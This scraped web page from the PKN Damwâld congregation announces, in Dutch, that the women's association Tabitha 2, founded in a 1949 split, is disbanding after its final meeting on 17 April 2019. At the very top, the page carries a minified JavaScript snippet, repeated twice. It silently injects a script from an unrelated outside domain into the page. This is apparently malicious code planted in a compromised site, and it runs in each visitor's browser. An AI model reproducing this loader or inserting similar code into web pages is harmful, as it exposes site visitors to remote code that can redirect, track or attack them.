;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vrouwenvereniging Tabitha stopt - PKN Damwâld
17 april 2019
19:45 t/m 21:00
't Skûlplak
Vrouwenvereniging Tabitha stopt

De Hervormde vrouwenvereniging Tabitha werd op 3 november 1932 opgericht. In 1949 vond een gedeelte van de leden het vergaderen in de avonduren, gezien hun leeftijd te bezwaarlijk worden en ging in de middaguren verder.De jongere leden wilden liever in de avonduren verder. Daarom werd op 2 maart 1949 besloten om de vereniging te splitsen. Het jongere deel ging als Tabitha 2 verder. Dat is dus inmiddels 70 jaar geleden. Maar ook deze jonge dames zijn intussen ouder geworden. Onze groep is inmiddels gekrompen naar 16 (zeer trouwe) leden die om de week nog hun verenigingsavonden in het Skûlplak hebben.
De laatste jaren is de animo om zich bij ons aan te sluiten nihil. Hieruit volgt, dat de gemiddelde leeftijd van het bestuur dat al jaren door dezelfde personen wordt gevormd steeds hoger wordt. Daar wij voor de toekomst geen positieve ontwikkelingen verwachten hebben wij besloten de vereniging op te heffen.Hiermee verdwijnt jammer genoeg wel weer een stukje gemeenteleven.
Op D.V. woensdag 17 april a.s zal onze laatste verenigingsavond zijn.
Bestuur van Tabitha 2,

Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld